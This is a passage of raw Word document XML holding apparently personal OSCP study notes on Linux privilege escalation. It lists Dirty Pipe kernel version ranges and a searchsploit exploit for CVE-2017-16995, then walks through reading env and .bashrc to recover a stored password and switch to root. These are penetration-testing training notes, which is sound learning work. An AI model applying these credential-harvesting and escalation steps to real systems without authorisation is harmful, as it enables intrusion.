      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another command is</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> uname -a</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, and more about it can be found in this document</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AE9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AEB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_y5pspbov7idl" w:id="379"/>
      <w:bookmarkEnd w:id="379"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kernel Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirty pipe:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AEE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="931"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dirty Pipe Vulnerable: 5.8 → 5.16.10 (inclusive), 5.15 → 5.15.24, 5.10 → 5.10.101</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AEF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1223"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">5.9.0 exploited in OSCP-B .149</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at the example in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 18.4.3. Exploiting Kernel Vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat /etc/issue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uname -r</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">arch</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu 16.04.3 LTS (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kernel 4.4.0-116-generic</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) was exploited in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OSCP 18.4.3. Exploiting Kernel Vulnerabilities</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="291"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They found exploit for</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux Kernel &lt; 4.13.9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AFA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="291"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">They used searchsploit 45010.c</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AFB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="291"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And it was cve-2017-16995</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AFC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002A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FE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_r8htvwcya04g" w:id="380"/>
      <w:bookmarkEnd w:id="380"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">User Trail Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002AFF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B00">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> OSCP 18.2.1. Inspecting User Trails</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B02">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Environment variable:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B03">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4530569" cy="3405188"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="434" name="image423.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image423.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId917"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4530569" cy="3405188"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B04">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="347"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">env</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Interestingly, the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SCRIPT_CREDENTIALS</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> variable holds a value that resembles a password. To </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">confirm that we are dealing with a permanent variable, we need to inspect the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.bashrc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B07">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="380"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.bashrc</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a shell startup file that Bash</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> runs every time you start a new interactive,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> non-login shell—for example, when you open a new terminal tab or window in a graphical environment, or when you SSH into a system without starting a login shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4538663" cy="2661061"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="94" name="image102.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image102.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId918"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4538663" cy="2661061"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B0A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="866"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cat .bashrc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B0B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B0C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From the above listing, we can confirm that the variable holding the password is exported when a user's shell is launched.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's first try to escalate our privileges by directly typing the newly-discovered password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B0F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B10">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4997437" cy="1473603"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="392" name="image387.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image387.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId919"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4997437" cy="1473603"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B11">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su - root</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B12">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">su root </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Cardo" w:cs="Cardo" w:eastAsia="Cardo" w:hAnsi="Cardo"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">→ switch to root but keep your current environment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002B13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="252"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Switches to the root user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">without</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> simulating a full login</w:t>
      </w:r>
    </w:p>
